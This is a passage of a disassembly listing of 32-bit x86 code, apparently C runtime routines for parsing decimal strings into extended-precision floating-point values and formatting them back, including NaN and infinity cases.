loc_421326: ; CODE XREF: sub_4211F1+1A�j
; sub_4211F1+36�j
mov ds:dword_48A014, 9
loc_421330: ; CODE XREF: sub_4211F1+4E�j
; sub_4211F1+63�j
or eax, 0FFFFFFFFh
loc_421333: ; CODE XREF: sub_4211F1+133�j
pop esi
pop ebx
leave
retn
sub_4211F1 endp
; =============== S U B R O U T I N E =======================================
sub_421337 proc near ; CODE XREF: sub_420331+2B�p
; sub_420331+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_42134D
cmp ecx, esi
jnb short loc_421350
loc_42134D: ; CODE XREF: sub_421337+10�j
push 1
pop eax
loc_421350: ; CODE XREF: sub_421337+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_421337 endp
; =============== S U B R O U T I N E =======================================
sub_421358 proc near ; CODE XREF: sub_421411+40�p
; sub_421411+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_42138A
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_42138A
inc dword ptr [esi+8]
loc_42138A: ; CODE XREF: sub_421358+19�j
; sub_421358+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_4213A2
inc dword ptr [esi+8]
loc_4213A2: ; CODE XREF: sub_421358+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_421337
add esp, 0Ch
pop edi
pop esi
retn
sub_421358 endp
; =============== S U B R O U T I N E =======================================
sub_4213B6 proc near ; CODE XREF: sub_421411+30�p
; sub_421411+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_4213B6 endp
; =============== S U B R O U T I N E =======================================
sub_4213E4 proc near ; CODE XREF: sub_4219A9+1C8�p
; sub_421EA1+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4213E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421411 proc near ; CODE XREF: sub_4214D8+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_421485
push edi
mov [ebp+arg_8], eax
loc_421438: ; CODE XREF: sub_421411+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_4213B6
push ebx
call sub_4213B6
lea eax, [ebp+var_10]
push eax
push ebx
call sub_421358
push ebx
call sub_4213B6
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_421358
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_421438
xor edx, edx
pop edi
loc_421485: ; CODE XREF: sub_421411+21�j
; sub_421411+9F�j
cmp [ebx+8], edx
jnz short loc_4214B2
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_421485
; ---------------------------------------------------------------------------
loc_4214B2: ; CODE XREF: sub_421411+77�j
mov esi, 8000h
loc_4214B7: ; CODE XREF: sub_421411+B9�j
test [ebx+8], esi
jnz short loc_4214CC
push ebx
call sub_4213B6
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_4214B7
; ---------------------------------------------------------------------------
loc_4214CC: ; CODE XREF: sub_421411+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_421411 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4214D8 proc near ; CODE XREF: sub_42067A+17�p
; sub_4206A7+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_421513: ; CODE XREF: sub_4214D8+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_421529
cmp cl, 9
jz short loc_421529
cmp cl, 0Ah
jz short loc_421529
cmp cl, 0Dh
jnz short loc_42152C
loc_421529: ; CODE XREF: sub_4214D8+40�j
; sub_4214D8+45�j ...
inc edi
jmp short loc_421513
; ---------------------------------------------------------------------------
loc_42152C: ; CODE XREF: sub_4214D8+4F�j
push 4
pop esi
loc_42152F: ; CODE XREF: sub_4214D8+AE�j
; sub_4214D8+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_4217B2 ; default
; jumptable 0042153B case 10
jmp off_421979[eax*4] ; switch jump
loc_421542: ; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 0
jl short loc_421553
cmp bl, 39h
jg short loc_421553
loc_42154C: ; CODE XREF: sub_4214D8+C4�j
; sub_4214D8+118�j
push 3
jmp loc_421770
; ---------------------------------------------------------------------------
loc_421553: ; CODE XREF: sub_4214D8+6D�j
; sub_4214D8+72�j
cmp bl, ds:byte_4397B0
jnz short loc_421562
loc_42155B: ; CODE XREF: sub_4214D8+124�j
push 5
jmp loc_4217A8
; ---------------------------------------------------------------------------
loc_421562: ; CODE XREF: sub_4214D8+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_421588
dec eax
dec eax
jz short loc_42157C
sub eax, 3
jnz loc_42184B
jmp loc_42160B
; ---------------------------------------------------------------------------
loc_42157C: ; CODE XREF: sub_4214D8+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_42152F
; ---------------------------------------------------------------------------
loc_421588: ; CODE XREF: sub_4214D8+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_42152F
; ---------------------------------------------------------------------------
loc_421591: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 1
mov [ebp+var_10], edx
jl short loc_42159E
cmp bl, 39h
jle short loc_42154C
loc_42159E: ; CODE XREF: sub_4214D8+BF�j
cmp bl, ds:byte_4397B0
jz loc_421666
cmp bl, 2Bh
jz short loc_4215E0
cmp bl, 2Dh
jz short loc_4215E0
cmp bl, 30h
jz short loc_42160B
loc_4215B9: ; CODE XREF: sub_4214D8+207�j
cmp bl, 43h
jle loc_42184B
cmp bl, 45h
jle short loc_4215D9
cmp bl, 63h
jle loc_42184B
cmp bl, 65h
jg loc_42184B
loc_4215D9: ; CODE XREF: sub_4214D8+ED�j
push 6
jmp loc_4217A8
; ---------------------------------------------------------------------------
loc_4215E0: ; CODE XREF: sub_4214D8+D5�j
; sub_4214D8+DA�j ...
dec edi
push 0Bh
jmp loc_4217A8
; ---------------------------------------------------------------------------
loc_4215E8: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 2
jl short loc_4215F6
cmp bl, 39h
jle loc_42154C
loc_4215F6: ; CODE XREF: sub_4214D8+113�j
cmp bl, ds:byte_4397B0
jz loc_42155B
cmp bl, 30h
jnz loc_4217C0
loc_42160B: ; CODE XREF: sub_4214D8+9F�j
; sub_4214D8+DF�j
mov eax, edx
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_421612: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
mov [ebp+var_10], edx ; jumptable 0042153B case 3
loc_421615: ; CODE XREF: sub_4214D8+184�j
cmp ds:dword_4397AC, edx
jle short loc_42162E
movzx eax, bl
push esi
push eax
call sub_41A642
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42163C
; ---------------------------------------------------------------------------
loc_42162E: ; CODE XREF: sub_4214D8+143�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42163C: ; CODE XREF: sub_4214D8+154�j
test eax, eax
jz short loc_42165E
cmp [ebp+var_4], 19h
jnb short loc_421656
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_421659
; ---------------------------------------------------------------------------
loc_421656: ; CODE XREF: sub_4214D8+16C�j
inc [ebp+var_8]
loc_421659: ; CODE XREF: sub_4214D8+17C�j
mov bl, [edi]
inc edi
jmp short loc_421615
; ---------------------------------------------------------------------------
loc_42165E: ; CODE XREF: sub_4214D8+166�j
cmp bl, ds:byte_4397B0
jnz short loc_4216CD
loc_421666: ; CODE XREF: sub_4214D8+CC�j
mov eax, esi
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_42166D: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp [ebp+var_4], 0 ; jumptable 0042153B case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_421686
loc_421679: ; CODE XREF: sub_4214D8+1AC�j
cmp bl, 30h
jnz short loc_421686
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_421679
; ---------------------------------------------------------------------------
loc_421686: ; CODE XREF: sub_4214D8+19F�j
; sub_4214D8+1A4�j ...
cmp ds:dword_4397AC, edx
jle short loc_42169F
movzx eax, bl
push esi
push eax
call sub_41A642
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4216AD
; ---------------------------------------------------------------------------
loc_42169F: ; CODE XREF: sub_4214D8+1B4�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4216AD: ; CODE XREF: sub_4214D8+1C5�j
test eax, eax
jz short loc_4216CD
cmp [ebp+var_4], 19h
jnb short loc_4216C8
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_4216C8: ; CODE XREF: sub_4214D8+1DD�j
mov bl, [edi]
inc edi
jmp short loc_421686
; ---------------------------------------------------------------------------
loc_4216CD: ; CODE XREF: sub_4214D8+18C�j
; sub_4214D8+1D7�j
cmp bl, 2Bh
jz loc_4215E0
cmp bl, 2Dh
jz loc_4215E0
jmp loc_4215B9
; ---------------------------------------------------------------------------
loc_4216E4: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp ds:dword_4397AC, edx ; jumptable 0042153B case 5
mov [ebp+var_24], edx
jle short loc_421700
movzx eax, bl
push esi
push eax
call sub_41A642
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42170E
; ---------------------------------------------------------------------------
loc_421700: ; CODE XREF: sub_4214D8+215�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42170E: ; CODE XREF: sub_4214D8+226�j
test eax, eax
jz loc_4217C0
mov eax, esi
jmp short loc_421771
; ---------------------------------------------------------------------------
loc_42171A: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
lea ecx, [edi-2] ; jumptable 0042153B case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_42172A
cmp bl, 39h
jle short loc_42176E
loc_42172A: ; CODE XREF: sub_4214D8+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_4217A6
dec eax
dec eax
jz short loc_42179A
sub eax, 3
jnz loc_42184E
loc_42173F: ; CODE XREF: sub_4214D8+2A4�j
push 8
jmp short loc_4217A8
; ---------------------------------------------------------------------------
loc_421743: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
mov [ebp+var_20], edx ; jumptable 0042153B case 8
loc_421746: ; CODE XREF: sub_4214D8+276�j
cmp bl, 30h
jnz short loc_421750
mov bl, [edi]
inc edi
jmp short loc_421746
; ---------------------------------------------------------------------------
loc_421750: ; CODE XREF: sub_4214D8+271�j
cmp bl, 31h
jl loc_42184B
cmp bl, 39h
jg loc_42184B
jmp short loc_42176E
; ---------------------------------------------------------------------------
loc_421764: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 7
jl short loc_421777
cmp bl, 39h
jg short loc_421777
loc_42176E: ; CODE XREF: sub_4214D8+250�j
; sub_4214D8+28A�j
push 9
loc_421770: ; CODE XREF: sub_4214D8+76�j
pop eax
loc_421771: ; CODE XREF: sub_4214D8+240�j
dec edi
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_421777: ; CODE XREF: sub_4214D8+28F�j
; sub_4214D8+294�j
cmp bl, 30h
jnz short loc_4217C0
jmp short loc_42173F
; ---------------------------------------------------------------------------
loc_42177E: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp [ebp+arg_18], 0 ; jumptable 0042153B case 11
jz short loc_4217AE
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_4217A6
dec eax
dec eax
jnz loc_42184E
loc_42179A: ; CODE XREF: sub_4214D8+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_4217A6: ; CODE XREF: sub_4214D8+258�j
; sub_4214D8+2B8�j
push 7
loc_4217A8: ; CODE XREF: sub_4214D8+85�j
; sub_4214D8+103�j ...
pop eax
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_4217AE: ; CODE XREF: sub_4214D8+2AA�j
push 0Ah
dec edi
pop eax
loc_4217B2: ; CODE XREF: sub_4214D8+5D�j
; sub_4214D8+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0042153B case 10
jz loc_421850
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_4217C0: ; CODE XREF: sub_4214D8+12D�j
; sub_4214D8+238�j ...
mov edi, [ebp+arg_8]
jmp loc_421850
; ---------------------------------------------------------------------------
loc_4217C8: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
mov [ebp+var_20], 1 ; jumptable 0042153B case 9
xor esi, esi
loc_4217D1: ; CODE XREF: sub_4214D8+339�j
cmp ds:dword_4397AC, 1
jle short loc_4217E9
movzx eax, bl
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_4217F8
; ---------------------------------------------------------------------------
loc_4217E9: ; CODE XREF: sub_4214D8+300�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_4217F8: ; CODE XREF: sub_4214D8+30F�j
test eax, eax
jz short loc_421818
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_421813
mov bl, [edi]
inc edi
jmp short loc_4217D1
; ---------------------------------------------------------------------------
loc_421813: ; CODE XREF: sub_4214D8+334�j
mov esi, 1451h
loc_421818: ; CODE XREF: sub_4214D8+322�j
mov [ebp+var_1C], esi
loc_42181B: ; CODE XREF: sub_4214D8+371�j
cmp ds:dword_4397AC, 1
jle short loc_421833
movzx eax, bl
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_421842
; ---------------------------------------------------------------------------
loc_421833: ; CODE XREF: sub_4214D8+34A�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_421842: ; CODE XREF: sub_4214D8+359�j
test eax, eax
jz short loc_42184B
mov bl, [edi]
inc edi
jmp short loc_42181B
; ---------------------------------------------------------------------------
loc_42184B: ; CODE XREF: sub_4214D8+99�j
; sub_4214D8+E4�j ...
dec edi
jmp short loc_421850
; ---------------------------------------------------------------------------
loc_42184E: ; CODE XREF: sub_4214D8+261�j
; sub_4214D8+2BC�j
mov edi, ecx
loc_421850: ; CODE XREF: sub_4214D8+2DD�j
; sub_4214D8+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_421938
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_42187C
cmp [ebp+var_45], 5
jl short loc_421870
inc [ebp+var_45]
loc_421870: ; CODE XREF: sub_4214D8+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_42187F
; ---------------------------------------------------------------------------
loc_42187C: ; CODE XREF: sub_4214D8+38D�j
mov eax, [ebp+var_C]
loc_42187F: ; CODE XREF: sub_4214D8+3A2�j
cmp [ebp+var_4], 0
jbe loc_42192E
loc_421889: ; CODE XREF: sub_4214D8+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_421897
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_421889
; ---------------------------------------------------------------------------
loc_421897: ; CODE XREF: sub_4214D8+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_421411
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_4218B6
neg eax
loc_4218B6: ; CODE XREF: sub_4214D8+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_4218C1
add eax, [ebp+arg_10]
loc_4218C1: ; CODE XREF: sub_4214D8+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_4218C9
sub eax, [ebp+arg_14]
loc_4218C9: ; CODE XREF: sub_4214D8+3EC�j
cmp eax, 1450h
jle short loc_421900
mov [ebp+var_2C], 1
loc_4218D7: ; CODE XREF: sub_4214D8+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_4218E3: ; CODE XREF: sub_4214D8+454�j
; sub_4214D8+45E�j
cmp [ebp+var_2C], 0
jz short loc_421949
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_42195E
; ---------------------------------------------------------------------------
loc_421900: ; CODE XREF: sub_4214D8+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_421910
mov [ebp+var_30], 1
jmp short loc_4218D7
; ---------------------------------------------------------------------------
loc_421910: ; CODE XREF: sub_4214D8+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_4220C1
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_4218E3
; ---------------------------------------------------------------------------
loc_42192E: ; CODE XREF: sub_4214D8+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_4218E3
; ---------------------------------------------------------------------------
loc_421938: ; CODE XREF: sub_4214D8+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_42195E
; ---------------------------------------------------------------------------
loc_421949: ; CODE XREF: sub_4214D8+40F�j
cmp [ebp+var_30], 0
jz short loc_42195E
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_42195E: ; CODE XREF: sub_4214D8+426�j
; sub_4214D8+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4214D8 endp
; ---------------------------------------------------------------------------
off_421979 dd offset loc_421542 ; DATA XREF: sub_4214D8+63�r
dd offset loc_421591 ; jump table for switch statement
dd offset loc_4215E8
dd offset loc_421612
dd offset loc_42166D
dd offset loc_4216E4
dd offset loc_42171A
dd offset loc_421764
dd offset loc_421743
dd offset loc_4217C8
dd offset loc_4217B2
dd offset loc_42177E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219A9 proc near ; CODE XREF: sub_42074B+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_421A0B
mov byte ptr [ebx+2], 2Dh
jmp short loc_421A0F
; ---------------------------------------------------------------------------
loc_421A0B: ; CODE XREF: sub_4219A9+5A�j
mov byte ptr [ebx+2], 20h
loc_421A0F: ; CODE XREF: sub_4219A9+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_421A35
test edi, edi
jnz short loc_421A35
cmp [ebp+arg_0], edi
jnz short loc_421A35
loc_421A20: ; CODE XREF: sub_4219A9+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_421C33
; ---------------------------------------------------------------------------
loc_421A35: ; CODE XREF: sub_4219A9+6C�j
; sub_4219A9+70�j ...
cmp dx, si
jnz short loc_421AB4
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_421A4E
cmp [ebp+arg_0], 0
jz short loc_421A5D
loc_421A4E: ; CODE XREF: sub_4219A9+9D�j
test edi, 40000000h
jnz short loc_421A5D
push offset a1Snan ; "1#SNAN"
jmp short loc_421AA3
; ---------------------------------------------------------------------------
loc_421A5D: ; CODE XREF: sub_4219A9+A3�j
; sub_4219A9+AB�j
test cx, cx
jz short loc_421A77
cmp edi, 0C0000000h
jnz short loc_421A77
cmp [ebp+arg_0], 0
jnz short loc_421A9E
push offset a1Ind ; "1#IND"
jmp short loc_421A86
; ---------------------------------------------------------------------------
loc_421A77: ; CODE XREF: sub_4219A9+B7�j
; sub_4219A9+BF�j
cmp edi, eax
jnz short loc_421A9E
cmp [ebp+arg_0], 0
jnz short loc_421A9E
push offset a1Inf ; "1#INF"
loc_421A86: ; CODE XREF: sub_4219A9+CC�j
lea eax, [ebx+4]
push eax
call sub_4179C0
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_421A95: ; CODE XREF: sub_4219A9+109�j
and [ebp+var_4], 0
jmp loc_421C0C
; ---------------------------------------------------------------------------
loc_421A9E: ; CODE XREF: sub_4219A9+C5�j
; sub_4219A9+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_421AA3: ; CODE XREF: sub_4219A9+B2�j
lea eax, [ebx+4]
push eax
call sub_4179C0
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_421A95
; ---------------------------------------------------------------------------
loc_421AB4: ; CODE XREF: sub_4219A9+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_4220C1
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_421B15
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_421EA1
pop ecx
pop ecx
loc_421B15: ; CODE XREF: sub_4219A9+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_421B2F
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_421B32
jmp loc_421A20
; ---------------------------------------------------------------------------
loc_421B2F: ; CODE XREF: sub_4219A9+173�j
mov edi, [ebp+arg_C]
loc_421B32: ; CODE XREF: sub_4219A9+17F�j
cmp edi, 15h
jle short loc_421B3A
push 15h
pop edi
loc_421B3A: ; CODE XREF: sub_4219A9+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_421B50: ; CODE XREF: sub_4219A9+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_4213B6
dec [ebp+arg_14]
pop ecx
jnz short loc_421B50
test esi, esi
jge short loc_421B7A
neg esi
and esi, 0FFh
jle short loc_421B7A
loc_421B6D: ; CODE XREF: sub_4219A9+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4213E4
dec esi
pop ecx
jnz short loc_421B6D
loc_421B7A: ; CODE XREF: sub_4219A9+1B8�j
; sub_4219A9+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_421BD7
mov [ebp+arg_C], ecx
loc_421B8A: ; CODE XREF: sub_4219A9+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_4213B6
lea eax, [ebp+var_10]
push eax
call sub_4213B6
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_421358
lea eax, [ebp+var_10]
push eax
call sub_4213B6
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_421B8A
mov eax, [ebp+arg_14]
loc_421BD7: ; CODE XREF: sub_4219A9+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_421C14
loc_421BE4: ; CODE XREF: sub_4219A9+248�j
cmp eax, ecx
jb short loc_421BF7
cmp byte ptr [eax], 39h
jnz short loc_421BF3
mov byte ptr [eax], 30h
dec eax
jmp short loc_421BE4
; ---------------------------------------------------------------------------
loc_421BF3: ; CODE XREF: sub_4219A9+242�j
cmp eax, ecx
jnb short loc_421BFB
loc_421BF7: ; CODE XREF: sub_4219A9+23D�j
inc eax
inc word ptr [ebx]
loc_421BFB: ; CODE XREF: sub_4219A9+24C�j
inc byte ptr [eax]
loc_421BFD: ; CODE XREF: sub_4219A9+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_421C0C: ; CODE XREF: sub_4219A9+F0�j
mov eax, [ebp+var_4]
loc_421C0F: ; CODE XREF: sub_4219A9+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
